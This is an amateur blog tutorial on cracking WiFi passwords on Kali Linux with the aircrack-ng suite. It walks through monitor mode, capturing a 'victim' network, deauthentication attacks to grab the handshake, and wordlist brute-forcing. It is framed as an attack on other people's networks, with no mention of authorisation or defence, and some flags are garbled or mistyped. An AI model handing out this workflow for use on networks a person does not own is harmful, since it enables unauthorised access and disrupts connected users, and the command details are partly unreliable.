How to Hack a wifi | Bruteforcing | Using wordlist | Kali Linux

INTRO...

Hello friends today you are going t learn how to hack a wifi using a wordlist which is called BRUTEFORCING.It actually means that to hack using a wordlist from which our system will check all the passwords which are given in the list automatically and will provide us with the correct password.So lets start...

BRUTEFORCING..


Bruteforcing is the most common atttack which is used by hackers to hack passwords.It actually means that to use file which contains a list of possible passwords and let the machine try to find out the correct password from the given list.It takes a lot of time to crack passwords, but it is most usefull when you have a list which contains the real password.So to hack a wifi you need following things....

#kali linux

#a good wordlist

#good skills of programming

LETS BEGIN..

After you have installed kali on your pc....

#open terminal..

Terminal is the command window of linux from which you can code for different purposes like hacking , programming ,changing settings etc.

So open it..
And type

#airmon-ng check 

It will check for different processes and you will have to kill them..so type

#airmon-ng check kill

It will kill all the processes..Now type.

#airmon-ng

It will show you different interfaces...you have to choose one..
my interface is wlan0..

Now you have to start the interface..type

Free Traffic # airmon-ng start wlan0

Now you have started the interface...now you have to dump it .type

#airodump-ng wlan0mon

It will show the available wifi networks with their details...
now type.

#airodump-ng -c (channel of the wifi) -w(the name of the wifi) --bssid(the bssid of the wifi) wlanomon

Now it will show your victim wifi and their details..Now type..

 #aireplay-ng  -0 7 -a (bssid of the wifi) -b (station of the wifi) wlan0mon

Open new terminal and type ls.. you will see a list in which there will be some files which will contain some files which will be named wiht your vicim wifi.cap.. which is the handshake authentication..Now type   

#aircrack-ng  -w  wordlist.lst  -b(bssid) (name of the handshake authentication.cap file)

Press enter it will start cracking the password from the wordlist...

It may take some time..Be patient....

CHECK AFTER SOMETIME AND CONGRATULATIONS!!!
YOU HAVE CRACKED THE PASSWORD...


WATCH VIDEOS ON WIFI HACKING ON YOUTUBE CLICK   www.youtube.com


GO AND TRY IT..AND REMEMBER...


ONE MISTAKE IN HACKING CAN MAKE YOU TRAPPED..!!!

Comments